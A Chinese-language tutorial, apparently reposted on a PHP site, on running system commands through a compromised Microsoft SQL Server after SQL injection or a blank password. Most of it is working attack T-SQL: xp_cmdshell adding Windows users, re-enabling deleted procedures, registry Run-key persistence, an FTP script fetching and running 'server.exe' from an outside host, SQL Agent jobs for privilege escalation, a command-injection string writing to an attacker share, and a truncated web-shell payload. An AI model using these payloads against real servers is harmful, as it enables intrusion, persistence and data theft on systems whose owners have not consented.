怎样在MSSQL执行命令-mysql教程-PHP中文网

首页

数据库

mysql教程

怎样在MSSQL执行命令

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 07, 2016 pm 04:21 PM

mssql命令怎样执行

假设一台主机开了1433端口我们已通过SQL注入或是空弱密码远程连接能有哪些办法加一个系统管理员用户呢(或是执行系统命令) 1).XP_CMDSHELL 'cmd.exe /c net user aaa bbb /add' 人人都知道的办法,最大的好处是有回显,但是最怕 if exists (select * from dbo.

　　假设一台主机开了1433端口我们已通过SQL注入或是空弱密码远程连接

　　能有哪些办法加一个系统管理员用户呢(或是执行系统命令)

　　1).XP_CMDSHELL 'cmd.exe /c net user aaa bbb /add'

　　人人都知道的办法,最大的好处是有回显,但是最怕

　　if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and OBJECTPROPERTY(id, N'IsExtendedProc') = 1)

　　exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'

　　通过上面的T-SQL语句就可以把这个扩展储存删了

　　我们一般可以用

　　2k:

　　EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

　　SQL97:

　　EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xpsql70.dll'

　　就还原了.

　　但是有的人知道sp_addextendedproc也只不过是一个储存过程一样可以删除的

　　Drop PROCEDURE sp_addextendedproc

　　if exists (select * from

　　dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and

　　OBJECTPROPERTY(id, N'IsExtendedProc') = 1)

　　exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'

　　还原:

　　create procedure sp_addextendedproc --- 1996/08/30 20:13

　　@functname nvarchar(517),/* (owner.)name of function to call */

　　@dllname varchar(255)/* name of DLL containing function */

　　set implicit_transactions off

　　if @@trancount > 0

　　begin

　　raiserror(15002,-1,-1,'sp_addextendedproc')

　　return (1)

　　end

　　** Create the extended procedure mapping.

　　dbcc addextendedproc( @functname, @dllname)

　　return (0) -- sp_addextendedproc

　　呀呀写了这么多其实有个最简单的保护办法:

　　先NET stop mssqlserver,然后把xplog70.dll(SQL97下用xpsql70.dll)删了

　　再把服务打开就可以了

　　2)看了上面的你就明白了xp_cmdshell最终是可以被删除的没别的办法了吗?

　　有写注册表三:

　　xp_regwrite 'HKEY_LOCAL_MacHINE','SOFTWAREMicrosoftWindowscurrentversionrun', 'czy82','REG_SZ', net user czy bb /add

　　其实注册表还有好几个地方可以写的比如说注册表中的WEB浏览设置

　　用写注册表的办法不好的地方是不但没有回显而且不能马上运行实不实用我也不知道了

　　declare @s int

　　exec sp_oacreate "wscript.shell",@s out

　　--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo open ASP.7i24.com>c:a.txt"

　　--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo 123321>>c:a.txt"

　　--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo get server.exe>>c:a.txt"

　　--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo close>>c:a.txt"

　　--exec sp_oamethod @s,"run",NULL,"cmd.exe /c ftp -s:c:a.txt"

　　exec sp_oamethod @s,"run",NULL,"cmd.exe /c server"

　　对了正如你看到的我们还可以使用sp_oacreate和sp_oamethod在它们的作用下我们可以

　　调用系统的控件比如说fso,wsh,shell什么的,但是有个问题是并不能象xp_cmdshell那样

　　马上看到结果真的不能吗看下面的:

　　declare @s int,@o int ,@f int,@str nvarchar(4000)

　　/*exec sp_oacreate "wscript.shell",@s out

　　exec sp_oamethod @s,"run",NULL,"cmd.exe /c net user>c:temp.txt"*/

　　exec sp_oacreate "scripting.filesystemobject", @o out

　　exec sp_oamethod @o, "opentextfile", @f out,"c:temp.txt", 1

　　exec sp_oamethod @f, "readall",@str out

　　print @str

　　先执行注解内的然后执行外面的其实原理很简单就是利用>把结果写到一个文件中然后用

　　fso来读出来!很实用的

　　use msdb; --这儿不要是master哟

　　exec sp_add_job @job_name='czy82';

　　exec sp_add_jobstep @job_name='czy82',@step_name = 'Exec my sql',@subsystem='CMDEXEC',@command='dir c:>c:b.txt';

　　exec sp_add_jobserver @job_name = 'czy82',@server_name = 'smscomputer';

　　exec sp_start_job @job_name='czy82';

　　利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql后面的我们就可以

　　执行tsql语句了.

　　对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名

　　第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)

　　net start SQLSERVERAGENT

　　对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的

　　USE msdb

　　EXEC sp_add_job @job_name = 'GetSystemOnSQL',

　　@enabled = 1,

　　@description = 'This will give a low privileged user Access to

　　xp_cmdshell',

　　@delete_level = 1

　　EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',

　　@step_name = 'Exec my sql',

　　@subsystem = 'TSQL',

　　@command = 'exec master..xp_execresultset N''select ''''exec

　　master..xp_cmdshell "dir > c:agent-job-results.txt"'''''',N''Master'''

　　EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',

　　@server_name = '你的SQL的服务器名'

　　EXEC sp_start_job @job_name = 'GetSystemOnSQL'

　　不要怀疑上面的代码我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以

　　才让我们可以以public执行xp_cmdshell

　　5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)

　　在安焦有文章:?vul_id=2968

　　USE msdb

　　EXEC sp_add_job @job_name = 'ArbitraryFileCreate',

　　@enabled = 1,

　　@description = 'This will create a file called c:sqlafc123.txt',

　　@delete_level = 1

　　EXEC sp_add_jobstep @job_name = 'ArbitraryFileCreate',

　　@step_name = 'SQLA

　　FC',

　　@subsystem = 'TSQL',

　　@command = 'select ''hello, this file was created by the SQL Agent.''',

　　@output_file_name = 'c:sqlafc123.txt'

　　EXEC sp_add_jobserver @job_name = 'ArbitraryFileCreate',

　　@server_name = 'SERVER_NAME'

　　EXEC sp_start_job @job_name = 'ArbitraryFileCreate'

　　如果subsystem选的是:tsql在生成的文件的头部有如下内容

　　??揂rbitraryFileCreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19

　　----------------------------------------------

　　hello, this file was created by the SQL Agent.

　　(1 ?????)

　　所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员

　　命令的VBs文件到启动目录!

　　6)关于sp_makewebtask(可以写任意内容任意文件名的文件)

　　关于sp_MScopyscriptfile 看下面的例子

　　declare @command varchar(100)

　　declare @scripfile varchar(200)

　　set concat_null_yields_null off

　　select @command='dir c: > "attackeripsharedir.txt"'

　　select @scripfile='c:autoexec.bat > nul" | ' + @command + ' | rd "'

　　exec sp_MScopyscriptfile @scripfile ,''

　　这两个东东都还在测试试哟

　　让MSSQL的public用户得到一个本机的web shell:)

　　sp_makewebtask @outputfile='d:smsa.asp',@charset=gb2312,

　　--@query='select '''''

　　--@query='select '''' '

　　@query='select ''

　　" method="POST">

，

声明

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系admin@php.cn

每5分钟执行一次的Python脚本Sep 10, 2023 pm 03:33 PM

自动化和任务调度在简化软件开发中的重复任务方面发挥着至关重要的作用。想象一下，有一个Python脚本需要每5分钟执行一次，例如从API获取数据、执行数据处理或发送定期更新。如此频繁地手动运行脚本可能非常耗时并且容易出错。这就是任务调度的用武之地。在这篇博文中，我们将探讨如何安排Python脚本每5分钟执行一次，确保它自动运行而无需手动干预。我们将讨论可用于实现此目标的不同方法和库，使您能够有效地自动化任务。使用time.sleep()函数每5分钟运行一次Python脚本的一种简单方法是利用tim

Python竟然还可以计算农历！Apr 30, 2023 am 09:43 AM

最近处理工作任务的时候遇到了转换农历的问题。农历，是我国现行的传统历法。它是根据月相的变化周期，每一次月相朔望变化为一个月，参考太阳回归年为一年的长度，并加入二十四节气与设置闰月以使平均历年与回归年相适应[1]。对于我们处理数据来说，并不需要去详细研究农历与公历之间的转换关系。在Python中，ZhDate库支持农历-公历互相转换、日期加减以及全中文日期生成，内置了1900-2100年的农历数据，仅依赖Python内置模块。github.com/CutePandaSh/zhdate由于ZhDat

php怎么连接mssql数据库Oct 23, 2023 pm 12:02 PM

php连接mssql数据库的方法有使用PHP的MSSQL扩展、使用PDO等。详细介绍：1、使用PHP的MSSQL扩展方法，确保PHP安装了MSSQL扩展。可以在PHP配置文件（php.ini）中检查是否启用了mssql扩展；2、使用PDO方法，确保PHP安装了PDO扩展。可以在PHP配置文件（php.ini）中检查是否启用了pdo_sqlsrv扩展。

如何在 Rocky Linux 9 / AlmaLinux 9 上安装 KVMJun 09, 2023 pm 10:07 PM

KVM是内核虚拟机KernelVirtualizationMachine与大多数虚拟化平台一样，它将硬件资源（如CPU、内存、存储、网络、图形等）抽象化，并将它们分配给独立于宿主机运行的客户机。先决条件预装RockyLinux9/AlmaLinux9具有管理员权限的sudo用户互联网连接1、验证是否启用了硬件虚拟化首先，你需要验证你的系统是否启用了虚拟化功能。在大多数现代系统上，此功能已在BIOS中启用。但可以肯定的是，你可以验证是否如图所示启用了虚拟化。该命令探测是否存在VMX（虚拟机扩展Vi

Ubuntu安装PHP并配置MSSQL连接的详细指南Feb 29, 2024 am 11:15 AM

Ubuntu是一款流行的开源操作系统，常用于服务器运行。在Ubuntu上安装PHP并配置MSSQL连接是许多开发者和系统管理员经常需要做的操作之一。本文将为读者提供一份详细的指南，步骤包含安装PHP、设置Apache、安装MSSQLServer等内容，并附上具体的代码示例。第一步：安装PHP及相关扩展首先，我们需要安装PHP及其相关扩展，以便支持PHP连接

如何使用Python在Linux中进行脚本编写和执行Oct 05, 2023 am 11:45 AM

如何使用Python在Linux中进行脚本编写和执行在Linux操作系统中，我们可以使用Python编写并执行各种脚本。Python是一种简洁而强大的编程语言，它提供了丰富的库和工具，使得脚本编写变得更加简单和高效。下面我们将介绍在Linux中如何使用Python进行脚本编写和执行的基本步骤，同时提供一些具体的代码示例来帮助你更好地理解和运用。安装Pytho

超全！Python获取某一日期是“星期几”的六种方法！Apr 19, 2023 am 09:28 AM

在Python进行数据分析时，按照日期进行分组汇总也是被需要的，比如会找到销量的周期性规律。那么在用Python进行数据统计之前，就需要额外增加一步：从指定的日期当中获取星期几。比如2022年2月22日，还正好是正月廿二星期二，于是乎这一天登记结婚的人特别多。本文就以2022-02-22为例，演示Python获取指定日期是“星期几”的6种方法！weekday()datetime模块是一个Python内置库，无需再进行pip安装，它除了可以显示日期和时间之外，还可以进行日期和时间的运算以及格式化。

如何在 Ubuntu 22.04 / 20.04 上配置 FreeIPA 客户端Jun 09, 2023 pm 02:18 PM

FreeIPA是一个强大的开源身份管理系统，提供集中的身份验证、授权和计费服务。在我们之前的帖子中，我们已经讨论了FreeIPA服务器在RHEL8/RokcyLinux8/AlmaLinux8上的安装步骤。在FreeIPA服务器上创建用户进行集中认证登录到你的FreeIPA服务器并创建一个名为sysadm的用户，运行以下命令:$sudokinitadminPasswordforadmin@LINUXTECHI.LAN:$$sudoipaconfig-mod--defaultshell=/bin/

See all articles